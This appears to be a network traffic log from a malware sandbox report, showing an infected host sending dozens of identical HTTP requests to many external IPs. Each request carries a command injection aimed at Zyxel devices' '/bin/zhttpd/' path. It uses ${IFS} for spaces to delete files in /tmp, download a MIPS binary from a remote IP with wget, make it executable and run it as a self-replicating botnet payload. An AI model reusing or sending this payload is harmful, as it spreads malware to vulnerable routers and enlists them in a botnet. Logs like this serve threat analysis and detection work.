                                      Jan 14, 2024 15:50:58.571959019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7273192.168.2.1443950140.77.96.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572006941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7274192.168.2.1433636197.110.59.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572031975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7275192.168.2.1445050178.166.18.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572089911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7276192.168.2.14583244.210.80.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572120905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7277192.168.2.1440270160.183.226.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572180986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7278192.168.2.143435279.141.190.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572216988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7279192.168.2.1456840219.247.248.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572254896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7280192.168.2.1442130150.168.39.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572294950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7281192.168.2.1460940140.189.67.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572333097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7282192.168.2.14442685.71.32.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572391987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7283192.168.2.1443342125.53.112.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572431087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7284192.168.2.1439298173.173.3.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572479963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7285192.168.2.1454698141.234.26.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572531939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7286192.168.2.1453730218.23.199.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572575092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7287192.168.2.143302872.239.176.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572601080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7288192.168.2.1459374220.102.56.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572648048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7289192.168.2.1437694177.240.68.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572709084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7290192.168.2.1447274188.127.129.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572741985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7291192.168.2.1433446148.138.201.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572807074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7292192.168.2.144452439.35.213.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572829008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7293192.168.2.14578742.141.103.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572873116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7294192.168.2.146021868.125.26.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572911024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7295192.168.2.145335093.56.215.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.572962999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7296192.168.2.1456996176.238.150.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573007107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7297192.168.2.1440540112.229.202.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573046923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7298192.168.2.145175440.93.133.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573080063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7299192.168.2.1440998162.246.201.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573112965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7300192.168.2.144381853.195.249.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573164940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7301192.168.2.1457254120.16.130.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573200941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7302192.168.2.1455282190.78.107.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573232889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7303192.168.2.145059872.189.128.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573288918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7304192.168.2.144622893.132.233.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573337078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7305192.168.2.1456660155.221.83.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573384047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7306192.168.2.1450894207.169.13.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573409081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7307192.168.2.1456382222.126.136.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573434114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7308192.168.2.145193889.74.109.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573482037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7309192.168.2.1458598139.100.83.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573512077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7310192.168.2.1451100167.188.43.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573559046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7311192.168.2.1441432168.224.149.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573611021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7312192.168.2.1452690132.229.4.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573645115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7313192.168.2.1436436115.59.1.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573664904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7314192.168.2.144780813.35.187.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573720932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7315192.168.2.143333468.60.180.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573759079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7316192.168.2.144429838.155.146.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573796988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7317192.168.2.1436694171.177.99.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573859930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7318192.168.2.1451994175.205.173.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573903084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7319192.168.2.144453285.227.10.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573956966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7320192.168.2.145647841.95.79.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.573992968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7321192.168.2.143885842.194.25.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574008942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7322192.168.2.1446940106.6.100.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574091911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7323192.168.2.1434566142.138.60.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574105024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7324192.168.2.143845643.152.6.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574150085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7325192.168.2.1441038160.25.40.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574167967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7326192.168.2.1435562216.168.184.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574209929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7327192.168.2.1452700217.87.252.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574265003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7328192.168.2.143929475.136.29.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574295044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7329192.168.2.144765613.180.197.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574337006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7330192.168.2.1437126152.116.83.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574377060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7331192.168.2.1435240134.156.158.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574445009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7332192.168.2.1436412220.97.117.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574487925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7333192.168.2.1445734111.131.88.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574508905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7334192.168.2.145587617.77.188.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.574568033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7335192.168.2.1459144146.160.229.91443
                                      TimestampBytes transferredDirectionData
